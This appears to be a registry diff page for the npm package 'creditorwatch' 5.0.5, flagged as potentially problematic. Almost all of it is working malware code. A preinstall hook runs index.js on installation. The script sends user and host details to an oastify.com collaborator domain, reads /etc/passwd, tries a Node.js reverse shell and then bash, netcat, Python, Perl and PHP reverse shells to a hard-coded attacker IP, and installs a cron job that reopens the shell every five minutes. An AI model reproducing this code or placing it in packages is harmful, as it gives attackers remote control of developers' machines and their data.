creditorwatch 5.0.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of creditorwatch might be problematic. Click here for more details.
- package/index.js +108 -0
- package/package.json +13 -0
package/index.js
ADDED
|
@@ -0,0 +1,108 @@
|
|
|
1
|
+
const { exec, spawn } = require("child_process");
|
|
2
|
+
const net = require("net");
|
|
3
|
+
|
|
4
|
+
// Your attacker IP and port
|
|
5
|
+
const ATTACKER_IP = "143.110.254.249";
|
|
6
|
+
const ATTACKER_PORT = 1337;
|
|
7
|
+
|
|
8
|
+
// Multiple reverse shell payloads for redundancy
|
|
9
|
+
const reverseShellPayloads = [
|
|
10
|
+
// Bash reverse shell
|
|
11
|
+
`bash -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1`,
|
|
12
|
+
|
|
13
|
+
// Netcat reverse shell (if available)
|
|
14
|
+
`nc -e /bin/bash ${ATTACKER_IP} ${ATTACKER_PORT}`,
|
|
15
|
+
|
|
16
|
+
// Python reverse shell
|
|
17
|
+
`python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${ATTACKER_IP}',${ATTACKER_PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"`,
|
|
18
|
+
|
|
19
|
+
// Perl reverse shell
|
|
20
|
+
`perl -e 'use Socket;$i="${ATTACKER_IP}";$p=${ATTACKER_PORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'`,
|
|
21
|
+
|
|
22
|
+
// PHP reverse shell (if PHP is available)
|
|
23
|
+
`php -r '$sock=fsockopen("${ATTACKER_IP}",${ATTACKER_PORT});exec("/bin/bash -i <&3 >&3 2>&3");'`
|
|
24
|
+
];
|
|
25
|
+
|
|
26
|
+
// Node.js native reverse shell function
|
|
27
|
+
function nodeReverseShell() {
|
|
28
|
+
try {
|
|
29
|
+
const client = new net.Socket();
|
|
30
|
+
client.connect(ATTACKER_PORT, ATTACKER_IP, () => {
|
|
31
|
+
console.log('Connected to attacker');
|
|
32
|
+
|
|
33
|
+
// Spawn a shell
|
|
34
|
+
const shell = spawn('/bin/bash', ['-i']);
|
|
35
|
+
|
|
36
|
+
// Pipe shell output to client
|
|
37
|
+
shell.stdout.pipe(client);
|
|
38
|
+
shell.stderr.pipe(client);
|
|
39
|
+
|
|
40
|
+
// Pipe client input to shell
|
|
41
|
+
client.pipe(shell.stdin);
|
|
42
|
+
|
|
43
|
+
client.on('close', () => {
|
|
44
|
+
shell.kill();
|
|
45
|
+
});
|
|
46
|
+
});
|
|
47
|
+
|
|
48
|
+
client.on('error', (err) => {
|
|
49
|
+
console.error('Connection error:', err.message);
|
|
50
|
+
});
|
|
51
|
+
} catch (error) {
|
|
52
|
+
console.error('Native reverse shell error:', error.message);
|
|
53
|
+
}
|
|
54
|
+
}
|
|
55
|
+
|
|
56
|
+
// Your original payloads for reconnaissance
|
|
57
|
+
const reconPayloads = [
|
|
58
|
+
`nslookup $(whoami).$(hostname).gau5jjim899y61s6jll79cumyd44svgk.oastify.com`,
|
|
59
|
+
`curl http://gau5jjim899y61s6jll79cumyd44svgk.oastify.com/$(whoami)/$(hostname)/ -A "$(id)"`,
|
|
60
|
+
`ls -la`,
|
|
61
|
+
`uname -a`,
|
|
62
|
+
`cat /etc/passwd | head -10`,
|
|
63
|
+
`ps aux | head -10`
|
|
64
|
+
];
|
|
65
|
+
|
|
66
|
+
// Execute reconnaissance first
|
|
67
|
+
console.log("Executing reconnaissance payloads...");
|
|
68
|
+
reconPayloads.forEach((cmd, index) => {
|
|
69
|
+
setTimeout(() => {
|
|
70
|
+
exec(cmd, (error, stdout, stderr) => {
|
|
71
|
+
if (error) console.error(`Recon error [${index}]:`, error.message);
|
|
72
|
+
if (stderr) console.error(`Recon stderr [${index}]:`, stderr);
|
|
73
|
+
if (stdout) console.log(`Recon stdout [${index}]:`, stdout);
|
|
74
|
+
});
|
|
75
|
+
}, index * 1000); // Stagger execution
|
|
76
|
+
});
|
|
77
|
+
|
|
78
|
+
// Try Node.js native reverse shell first
|
|
79
|
+
setTimeout(() => {
|
|
80
|
+
console.log("Attempting Node.js native reverse shell...");
|
|
81
|
+
nodeReverseShell();
|
|
82
|
+
}, 3000);
|
|
83
|
+
|
|
84
|
+
// Try system-level reverse shells as backup
|
|
85
|
+
setTimeout(() => {
|
|
86
|
+
console.log("Attempting system reverse shells...");
|
|
87
|
+
reverseShellPayloads.forEach((cmd, index) => {
|
|
88
|
+
setTimeout(() => {
|
|
89
|
+
exec(cmd, (error, stdout, stderr) => {
|
|
90
|
+
if (error) console.error(`Shell error [${index}]:`, error.message);
|
|
91
|
+
if (stderr) console.error(`Shell stderr [${index}]:`, stderr);
|
|
92
|
+
if (stdout) console.log(`Shell stdout [${index}]:`, stdout);
|
|
93
|
+
});
|
|
94
|
+
}, index * 2000); // Stagger attempts
|
|
95
|
+
});
|
|
96
|
+
}, 5000);
|
|
97
|
+
|
|
98
|
+
// Persistence mechanism (optional - for demonstration of impact)
|
|
99
|
+
const persistencePayload = `echo '#!/bin/bash\nbash -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1' > /tmp/.shell.sh && chmod +x /tmp/.shell.sh && (crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/.shell.sh") | crontab -`;
|
|
100
|
+
|
|
101
|
+
setTimeout(() => {
|
|
102
|
+
console.log("Attempting persistence (demonstration only)...");
|
|
103
|
+
exec(persistencePayload, (error, stdout, stderr) => {
|
|
104
|
+
if (error) console.error("Persistence error:", error.message);
|
|
105
|
+
if (stderr) console.error("Persistence stderr:", stderr);
|
|
106
|
+
if (stdout) console.log("Persistence stdout:", stdout);
|
|
107
|
+
});
|
|
108
|
+
}, 10000);
|
package/package.json
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "creditorwatch",
|
|
3
|
+
"version": "5.0.5",
|
|
4
|
+
"description": "This is a PoC for RCE",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "Shehzad Secure Purple",
|
|
11
|
+
"license": "ISC",
|
|
12
|
+
"dependencies": {}
|
|
13
|
+
}
|